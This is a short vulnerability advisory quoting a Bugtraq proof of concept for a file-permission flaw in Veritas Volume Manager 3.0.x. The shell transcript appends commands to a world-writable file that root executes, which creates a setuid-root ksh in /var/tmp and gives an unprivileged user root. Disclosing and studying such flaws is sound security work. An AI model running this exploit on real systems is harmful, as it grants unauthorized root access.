|
|
Veritas Volume Manager 3.0.x File Permission Vulnerability
From the example posted to Bugtraq: # append our malicious commands to the world-writeable file foo@bar> id uid=500(foo) gid=25(programmers) foo@bar> ls -alt /var/opt/vmsa/logs/.server_pids -rw-rw-rw- 1 root root 27 Jun 8 16:06 /var/opt/vmsa/logs/.server_pids foo@bar> cat >> /var/opt/vmsa/logs/.server_pids cp /bin/ksh /var/tmp; chmod 4755 /var/tmp/ksh ^D foo@bar> cat /var/opt/vmsa/logs/.server_pids kill 328 kill 329 kill 337 cp /bin/ksh /var/tmp; chmod 4755 /var/tmp/ksh foo@bar> # wait for root to stop the server manually root@bar> /opt/VRTSvmsa/bin/vmsa_server -k Stopping VERITAS VM Storage Administrator Server root@bar> ls -alt /var/tmp total 406 drwxrwxrwt 2 sys sys 512 Jun 8 17:46 . -rwsr-xr-x 1 root other 192764 Jun 8 17:46 ksh -rw------- 1 root root 387 Jun 8 17:46 wsconAAArqayVa:0.0 drwxr-xr-x 26 root sys 512 Jun 8 09:51 .. # as an unprivileged user, run the suid-root shell we just created... foo@bar> /var/tmp/ksh # id uid=500(foo) gid=25(programmers) euid=0(root) # |
|
Privacy Statement |